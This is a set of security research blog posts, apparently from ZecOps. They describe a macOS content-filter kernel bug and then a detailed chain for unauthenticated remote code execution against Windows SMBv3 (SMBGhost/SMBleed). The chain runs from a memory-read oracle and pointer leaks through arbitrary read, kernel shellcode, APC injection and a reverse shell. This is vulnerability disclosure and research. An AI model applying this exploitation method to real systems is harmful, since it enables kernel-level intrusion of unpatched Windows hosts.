	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
eps.sae_dstaddr = sockaddr_dst;
eps.sae_dstaddrlen = 255;
int err = connectx(sock,&eps,SAE_ASSOCID_ANY,0,NULL,0,NULL,NULL);
  printf(“err: %d\n”,err);
close(sock);
return 0;

0x3- Patch

The patch of the issue is interesting too because while the source code (iOS 13.6 / MacOS 10.15.6) provide this patch:

if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the mecmpy_chk is gone alongside the patch!

Did the original developer knew this function was vulnerable and placed it there as a placeholder until a proper patch? Your guess is good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstarp_end (which is a wraparound of memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments they might give us valuable information
  2. Newly added code is oftentimes buggy
  3. Content filter code is complex and tricky 
  4. Now with Pangu’s recent blog post and Ian Beer mptcp bug we can learn that sockaddr->sa_len already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

Introduction

Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has less limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  (orange) LIST_ENTRY ConnectionBufferList;
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  (blue) PBYTE UserBufferPtr;
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  (blue) PBYTE PoolAllocationPtr;
/*38*/  (blue) PMDL pMdl1;
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  (blue) PMDL pMdl2;
/*58*/  (orange) PVOID pSrvNetWskStruct;
/*60*/  DWORD SmbFlags;
/*64*/  (orange) PVOID TracingPtr1;
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  (orange) PVOID TracingPtr2;
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can override those pointers in SRVNET_RECT, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECT struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC and such fix was left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECT struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though a 8-arguments function is intended to be called, we can replace the pointer with a function that expects any other amount of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECT struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECT struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECT struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECT struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version R5 and newer. Since Windows 10 version R5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor Incoming packets handled
Logical processor 1 0.2%
Logical processor 2 0.8%
Logical processor 3 7.9%
Logical processor 4 91.1%

Here’s the distribution of handling the decompression:

Logical processor Decompressions executed
Logical processor 1 13.3%
Logical processor 2 5.1%
Logical processor 3 6.8%
Logical processor 4 74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classify forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities, that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

Introduction

In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Aiming for RCE

Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in the modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows to leak parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for an unauthenticated RCE exploitation, the first thing we looked for is a way to read memory unauthenticated.

Diving into SMB

Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.

The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.

After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:

SMB2 NEGOTIATE → SMB2 SESSION_SETUP → SMB2 SESSION_SETUP

If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.

We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:

  • The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
  • The subsequent commands, until authentication completes successfully, must be SMB2 SESSION_SETUP. That is unless anonymous access to named pipes or shares is not restricted, and it is by default.

Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.

A closer look at SMB2 SESSION_SETUP

As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.

The NTLM Authenticate message

After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLM2 V2 Response structure. It’s a  variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) parameter is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks are verifying the AvPairs field.

The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.

AvPairs inside the SMB2 packet.

The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.

At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:

The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:

  • length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
  • length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.

According to the server response we can deduce the answer to our question.

So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.

Observation #1: Lookaside lists

As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.

The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.

Observation #2: Failing the decompression

Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):

In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:

Back to the NTLM Authenticate message

We can use the above observations to make our technique work by using two steps:

  1. Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
  2. Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.

This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.

Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.

Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.

Overcoming the offset limitation

